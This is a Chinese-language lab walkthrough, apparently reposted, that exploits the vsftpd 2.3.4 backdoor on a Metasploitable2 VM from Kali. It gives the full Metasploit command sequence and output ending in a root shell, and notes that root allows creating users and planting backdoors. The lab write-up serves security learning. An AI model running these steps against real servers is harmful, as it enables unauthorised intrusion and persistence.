metasploit2 - vsftpd 漏洞攻擊和拿shell


一、環境說明

目標IP: 本人虛擬機 192.168.80.134 ,使用 metasploit2

攻擊IP: 本人虛擬機 192.168.80.129 ,使用 kali

Metasploitable2 虛擬系統是一個特別制作的ubuntu操作系統,本身設計作為安全工具測試和演示常見漏洞攻擊。版本2已經可以下載,並且比上一個版本包含更多可利用的安全漏洞。這個版本的虛擬系統兼容VMware,VirtualBox,和其他虛擬平台。默認只開啟一個網絡適配器並且開啟NAT和Host-only,本鏡像一定不要暴漏在一個易受攻擊的網絡中。

Metasploitable2默認用戶名:msfadmin、密碼:msfadmin.

二、攻擊過程

1、啟動,這個啟動過程有點久,畢竟兩台虛擬機同時跑,機器有點頂不住

root@kali:~# msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

=[ metasploit v4.17.17-dev ]
+ -- --=[ 1817 exploits - 1031 auxiliary - 315 post ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

2、尋找漏洞代碼 (vsftpd),如果對方機器被掃描出  vsftpd 這種漏洞存在
msf > search vsftpd
[!] Module database cache not built yet, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution

3、在 VSFTPD v2.3.4  這個版本下有漏洞可以利用
msf > use exploit/unix/ftp/vsftpd_234_backdoor

4、顯示payloads
msf exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection

5、設置
msf exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact

6、查看參數
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

7、設置目標IP 

msf exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.80.134
rhost => 192.168.80.134
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.80.134 yes The target address
RPORT 21 yes The target port (TCP)

Payload options (cmd/unix/interact):

Name Current Setting Required Description
---- --------------- -------- -----------

Exploit target:

Id Name
-- ----
0 Automatic

8、開始溢出攻擊

msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.80.134:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.80.134:21 - USER: 331 Please specify the password.
[+] 192.168.80.134:21 - Backdoor service has been spawned, handling...
[+] 192.168.80.134:21 - UID: uid=0(root) gid=0(root)

[*] Found shell.
[*] Command shell session 1 opened (192.168.80.129:39981 -> 192.168.80.134:6200) at 2019-07-08 00:38:52 +0800

 

如上,得到一個反彈shell ,獲取到 root 權限,得到root權限已經可以干任何事情了,比如建用戶、留后門。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM